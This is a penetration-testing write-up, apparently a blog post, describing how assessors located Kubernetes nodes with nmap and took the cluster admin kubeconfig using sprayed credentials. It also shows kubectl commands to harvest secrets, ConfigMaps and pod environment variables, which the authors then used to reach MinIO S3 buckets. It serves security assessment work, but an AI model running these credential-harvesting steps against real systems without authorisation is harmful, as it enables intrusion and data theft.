
Accessing services through Kubernetes


During a pentest, security assessment experts often find themselves with a foothold in the infrastructure but no clear picture of what interesting assets it contains.

Since many organizations deploy services on Kubernetes, K8s clusters make attractive targets. But first they have to be found and understood.

One way to detect nodes is to look for hosts presenting an SSL certificate with the common name "Kubernetes Ingress Controller Fake Certificate" — the default certificate served by the ingress-nginx controller. This can be done, for example, with the nmap ssl-cert script.
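A minimal sketch of such a scan (the target range and output file name are placeholders):

```shell
# Scan a subnet for HTTPS endpoints and dump certificate details;
# look for "Kubernetes Ingress Controller Fake Certificate" in the results
# (10.10.0.0/16 is a placeholder range)
nmap -p 443 --script ssl-cert 10.10.0.0/16 -oN ingress-scan.txt
```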

Using this method on one of our projects, we found 47 nodes. Based on some of the hostnames and subnets, we concluded there was more than one cluster. But how can we determine which services are running in these clusters?

Because we collected all our findings in one place, we knew we already had user credentials with sudo privileges on these hosts, obtained from an earlier successful Password Spray attack.

The /etc/kubernetes/ directory on the master node contained not only the node's own configuration but also the cluster administrator's kubeconfig, which saved us time on privilege escalation.

Since the Kubernetes API was reachable only on the master node's localhost, we used SSH dynamic port forwarding (the -D option) when connecting to the node, and with the cluster administrator's kubeconfig we gained full access to the API.
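The tunnel itself can be opened like this (the username and hostname are placeholders):

```shell
# open a SOCKS proxy on local port 1080 that forwards traffic
# through the master node; -N: no remote command, just the tunnel
ssh -D 1080 -N user@k8s-master.domain.local
```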

Then, we gathered all the necessary information about the K8s cluster, adding an option to ignore the untrusted certificate and an environment variable to work through a proxy:

export KUBECONFIG=~/admin.conf
HTTPS_PROXY=socks5://127.0.0.1:1080 kubectl --insecure-skip-tls-verify=true cluster-info

The list of nodes will help evaluate the size of the cluster and note the hosts that belong to it:

kubectl get nodes -o wide

By namespace names, you can try to understand which services are running in the cluster (e.g., minio or keycloak):

kubectl get namespaces

To get full pod configurations, use output in YAML format. From the result you get the list of pods, which images the containers use, which ports the services listen on, and what is mounted into each pod's filesystem. The environment variables passed to a container often contain credentials or useful service configuration parameters. The -A flag returns information for all namespaces at once:

kubectl get pods -A -o yaml
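When the full YAML is too noisy for a first pass, a jsonpath query can narrow it down — for example, to just the container images per pod (a sketch):

```shell
# print namespace, pod name, and container images, one pod per line
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.containers[*].image}{"\n"}{end}'
```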

In the list of ingresses, you can see the names of virtual hosts and traffic routing rules (at the L7 level):

kubectl get ingress -A

Example output:

NAMESPACE   NAME    CLASS   HOSTS             ADDRESS       PORTS
minio       minio   nginx   s3.domain.local   10.10.10.10   80, 443

ConfigMaps are designed to store settings as key-value pairs. Although storing credentials, keys, and similar settings in them is not recommended, they still turn up there — along with scripts, CoreDNS settings, and other configuration files. So let's take a look:

kubectl get configmaps -A -o yaml
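A rough first pass over that output could look like this (the keyword list is an illustrative assumption, not exhaustive):

```shell
# grep the ConfigMap dump for keys that often hold sensitive values;
# -i: case-insensitive, -n: line numbers, -E: extended regex
kubectl get configmaps -A -o yaml | grep -inE 'pass(word)?|token|secret|key'
```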

We don't dump all the secrets at once — we only list them. If a pod configuration or a secret's name suggests its value is in use, we fetch just that value:

kubectl get secrets -A
kubectl get secret -n <namespace> <secret_name>
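Secret values come back base64-encoded, so one more step is needed to read them. A sketch (the namespace, secret name, key, and sample value below are placeholders):

```shell
# Fetch a single value from a secret with jsonpath, e.g.:
#   kubectl get secret -n minio minio -o jsonpath='{.data.root-password}'
# The value is base64-encoded; decode it locally:
echo 'c3VwZXJzZWNyZXQ=' | base64 -d   # -> supersecret
```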

If a virtual host discovered in the ingress list returns a 404 error when accessed, we can check the nginx logs (for each ingress-nginx-controller pod):

kubectl logs -n ingress-nginx ingress-nginx-controller-<id>

By analyzing the collected information, we can gain access to services. For example, a pod configuration showed that values from the minio secret are used to access the S3 storage at minio.minio.svc.cluster.local. The ingress list showed that the virtual host s3.domain.local is served on host 10.10.10.10, with incoming traffic on port 443/TCP routed to the minio pod in the minio namespace. Using the secret values, we gained access to the contents of the S3 buckets and demonstrated one of the business-critical risks.
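With the decoded credentials in hand, access to the storage could look like this — a sketch using the MinIO client, where the alias name and the credential placeholders are assumptions:

```shell
# register the S3 endpoint under a local alias, using the
# access and secret keys recovered from the minio secret
mc alias set pentest https://s3.domain.local <ACCESS_KEY> <SECRET_KEY>

# recursively list all buckets and objects reachable with these credentials
mc ls --recursive pentest
```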
